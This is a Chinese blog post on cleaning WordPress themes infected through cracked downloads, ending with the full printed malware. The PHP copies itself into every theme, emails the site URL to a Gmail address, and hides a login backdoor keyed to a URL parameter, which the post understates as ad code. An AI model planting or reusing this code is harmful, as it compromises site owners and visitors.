HardBirch

被添加恶意广告代码的WP主题修复方法

时间:13-04-02 栏目:WP技巧分享 作者:魔豆先生 评论:1 点击: 4,753 次

本文标签 ,

前几天接了一个修改个性化WordPress主题的项目,项目完工后发现本地Web服务器theme 目录下所有主题的 functions.php 文件被恶意修改,可恶! 因为之前没有发生过这种情况,从而怀疑这段代码是从破解主题中来的,与项目客户沟通后证实了这一点。这么多免费的主题,为什么偏偏要下载破解主题呢?这可 能是和国内的版权意识有很大关系吧。

 

与此同时,在《检测到几款主题存在恶意广告代码》文章中也提到:

 

恶意代码在你启用不同主题的时候,会把同样的恶意代码复制到所有主题的 functions.php 文件中去,从而在页面底部显示广告代码。

 

表现形式–怎么才知道自己的主题感染了恶意代码呢?

 

若你在转换主题时提示 “Fatal error: Cannot redeclare _check_isactive_widget()”、”_get_allwidgetcont” 等错误,那你的代码很有很可能已被污染。

 

解决方案–遇到这种问题怎么解决呢?

 

该代码通常隐藏在主题的 function.php 文件中。该恶意代码的前后还有一些 function 是调用热门文章或者 widget,估计是为隐藏恶意代码加上去的,如:”_check_isactive_widget” “_get_allwidgetcont” “_getsprepare_widget” “__popular_posts”,各位童鞋下载主题后请检查主题的 functions.php 文件中是否包含有以上类似代码,如有可一并删除。

 

文章最后附上我遇到的主题functions.php 文件中附带的恶意代码,请参考。

 

在此提醒各位童鞋,请到 WordPress 官方网站或 者主题原作者网站下载插件或者主题,以防代码已被修改过。另外请各位童鞋保护版权,支持正版主题。目前发现曾被修改的主题有 A-SuperCMS、iBlogPro 4、wpbus-D4、Colossus、ZCool Like、PixLog、Zeta Theme、Tripress。

 

如果你不知道如何检查自己的主题是否感染了恶意代码,偶米工作室可以为你代劳,并可以为你定制个性化的WordPress主题,例如:企业主题、博客主题、CMS主题、淘宝客主题等等,如有需要可以进一步与我们取得联系。

 

附:恶意代码(点击按钮展开代码)

 

1       function _check_isactive_widget(){
2    $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
3    $output=strip_tags($output,$allowed);
4    $direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") +6)));
5    if (is_array($direst)){
6    foreach ($direst as $item){
7    if (is_writable($item)){
8    $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
9    $cont=file_get_contents($item);
10    if (stripos($cont,$ftion) === false){
11    $explar=stripos( substr($cont,-20),"?".">") !== false ?"": "?".">";
12    $output .= $before ."Not found".$after;
13    if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") +2);}
14    $output=rtrim($output,"\n\t");fputs($f=fopen($item,"w+"),$cont .$explar ."\n".$widget);fclose($f);
15    $output .= ($showdots &&$ellipsis) ?"...": "";
16    }
17    }
18    }
19    }
20    return $output;
21    }
22    function _get_allwidgetcont($wids,$items=array()){
23        $places=array_shift($wids);
24        if(substr($places,-1) == "/"){
25            $places=substr($places,0,-1);
26            }
27        if(!file_exists($places) ||!is_dir($places)){
28            return false;
29        }elseif(is_readable($places)){
30            $elems=scandir($places);
31            foreach ($elems as $elem){
32                if ($elem != "."&&$elem != ".."){
33                    if (is_dir($places ."/".$elem)){
34                        $wids[]=$places ."/".$elem;
35                    }elseif (is_file($places ."/".$elem)&&$elem == substr(__FILE__,-13)){
36                        $items[]=$places ."/".$elem;
37                    }
38                }
39            }
40        }else{
41            return false;
42        }
43        if (sizeof($wids) >0){
44            return _get_allwidgetcont($wids,$items);
45        }else {
46            return $items;
47        }
48    }
49    if(!function_exists("stripos")){
50    function stripos(  $str,$needle,$offset = 0  ){
51    return strpos(  strtolower( $str ),strtolower( $needle ),$offset  );
52    }
53    }
54    if(!function_exists("strripos")){
55    function strripos(  $haystack,$needle,$offset = 0  ) {
56    if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );
57    if(  $offset <0  ){
58    $temp_cut = strrev(  substr( $haystack,0,abs($offset) )  );
59    }
60    else{
61    $temp_cut = strrev(    substr(   $haystack,0,max(  ( strlen($haystack) -$offset ),0  )   )    );
62    }
63    if(   (  $found = stripos( $temp_cut,strrev($needle) )  ) === FALSE   )return FALSE;
64    $pos = (   strlen(  $haystack  ) -(  $found +$offset +strlen( $needle )  )   );
65    return $pos;
66    }
67    }
68    if(!function_exists("scandir")){
69    function scandir($dir,$listDirectories=false,$skipDots=true) {
70    $dirArray = array();
71    if ($handle = opendir($dir)) {
72    while (false !== ($file = readdir($handle))) {
73    if (($file != "."&&$file != "..") ||$skipDots == true) {
74    if($listDirectories == false) {if(is_dir($file)) {continue;}}
75    array_push($dirArray,basename($file));
76    }
77    }
78    closedir($handle);
79    }
80    return $dirArray;
81    }
82    }
83    add_action("admin_head","_check_isactive_widget");
84    function _getsprepare_widget(){
85        if(!isset($com_length)) $com_length=120;
86        if(!isset($text_value)) $text_value="cookie";
87        if(!isset($allowed_tags)) $allowed_tags="<a>";
88        if(!isset($type_filter)) $type_filter="none";
89        if(!isset($expl)) $expl="";
90        if(!isset($filter_homes)) $filter_homes=get_option("home");
91        if(!isset($pref_filter)) $pref_filter="wp_";
92        if(!isset($use_more)) $use_more=1;
93        if(!isset($comm_type)) $comm_type="";
94        if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
95        if(!isset($postauthor_comment)) $postauthor_comment="";
96        if(!isset($comm_is_approved)) $comm_is_approved="";
97        if(!isset($postauthor)) $postauthor="auth";
98        if(!isset($more_link)) $more_link="(more...)";
99        if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
100        if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
101        if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
102        if(!isset($morecontents)) $morecontents="ma".$expl."il";
103        if(!isset($fmore)) $fmore=1;
104        if(!isset($fakeit)) $fakeit=1;
105        if(!isset($sql)) $sql="";
106        if (!$is_widget) :
107        global $wpdb,$post;
108        $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
109        if (!empty($post->post_password)) {
110            if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
111                if(is_feed()) {
112                    $output=__("There is no excerpt because this is a protected post.");
113                }else {
114                    $output=get_the_password_form();
115                }
116            }
117        }
118        if(!isset($f_tags)) $f_tags=1;
119        if(!isset($type_filters)) $type_filters=$filter_homes;
120        if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
121        if(!isset($aditional_tags)) $aditional_tags="div";
122        if(!isset($s_cont)) $s_cont=substr($sq1,stripos($sq1,"live"),20);#
123        if(!isset($more_link_text)) $more_link_text="Continue reading this entry";
124        if(!isset($showdots)) $showdots=1;
125        $comments=$wpdb->get_results($sql);
126        if($fakeit == 2) {
127            $text=$post->post_content;
128        }elseif($fakeit == 1) {
129            $text=(empty($post->post_excerpt)) ?$post->post_content : $post->post_excerpt;
130        }else {
131            $text=$post->post_excerpt;
132        }
133        $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=".call_user_func_array($getcommentscont,array($s_cont,$filter_homes,$type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
134        if($com_length <0) {
135            $output=$text;
136        }else {
137            if(!$no_more &&strpos($text,"<!--more-->")) {
138                $text=explode("<!--more-->",$text,2);
139                $l=count($text[0]);
140                $more_link=1;
141                $comments=$wpdb->get_results($sql);
142            }else {
143                $text=explode(" ",$text);
144                if(count($text) >$com_length) {
145                    $l=$com_length;
146                    $ellipsis=1;
147                }else {
148                    $l=count($text);
149                    $more_link="";
150                    $ellipsis=0;
151                }
152            }
153            for ($i=0;$i<$l;$i++)
154                $output .= $text[$i] ." ";
155        }
156        update_option("_is_widget_active_",1);
157        if("all"!= $allowed_tags) {
158            $output=strip_tags($output,$allowed_tags);
159            return $output;
160        }
161        endif;
162        $output=rtrim($output,"\s\n\t\r\0\x0B");
163        $output=($f_tags) ?balanceTags($output,true) : $output;
164        $output .= ($showdots &&$ellipsis) ?"...": "";
165        $output=apply_filters($type_filter,$output);
166        switch($aditional_tags) {
167            case("div") :
168                $tag="div";
169            break;
170            case("span") :
171                $tag="span";
172            break;
173            case("p") :
174                $tag="p";
175            break;
176            default :
177                $tag="span";
178            }
179        if ($use_more ) {
180            if($fmore) {
181                $output .= " <".$tag ." class=\"more-link\"><a href=\"".get_permalink($post->ID) ."#more-".$post->ID ."\" title=\"".$more_link_text ."\">".$more_link = !is_user_logged_in() &&@call_user_func_array($checkingwidgets,array($pagecount,true)) ?$more_link : ""."</a></".$tag .">"."\n";
182            }else {
183                $output .= " <".$tag ." class=\"more-link\"><a href=\"".get_permalink($post->ID) ."\" title=\"".$more_link_text ."\">".$more_link ."</a></".$tag .">"."\n";
184            }
185        }
186        return $output;
187    }
188    add_action("init","_getsprepare_widget");
189    function __popular_posts($no_posts=6,$before="<li>",$after="</li>",$show_pass_post=false,$duration="") {
190        global $wpdb;
191        $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
192        $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
193        if(!$show_pass_post) $request .= " AND post_password =\"\"";
194        if($duration !="") {
195            $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
196            }
197        $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
198        $posts=$wpdb->get_results($request);
199        $output="";
200        if ($posts) {
201            foreach ($posts as $post) {
202                $post_title=stripslashes($post->post_title);
203                $comment_count=$post->comment_count;
204                $permalink=get_permalink($post->ID);
205                $output .= $before ." <a href=\"".$permalink ."\" title=\"".$post_title."\">".$post_title ."</a> ".$after;
206                }
207        }else {
208            $output .= $before ."None found".$after;
209        }
210        return  $output;
211    }

声明: 本文由( 魔豆先生 )原创编译,转载请保留链接: 被添加恶意广告代码的WP主题修复方法

表示感谢 表示感谢

被添加恶意广告代码的WP主题修复方法:目前有1 条留言

  1. 沙发
    Ludou:

    文中的代码行号很恶心!

    2013-04-05 09:24 [回复]

发表评论


QQ群互动

Linux系统与内核学习群:194051772

WP建站技术学习交流群:194062106

魔豆之路QR

魔豆的Linux内核之路

魔豆的Linux内核之路

优秀工程师当看优秀书籍

优秀程序员,要看优秀书!

赞助商广告

热门标签

赞助魔豆博主
请喝个咖啡吧~ ^_^ 略表心意 请你吃点冷饮~ 表表我的感谢 ^_^

最新评论

友荐云推荐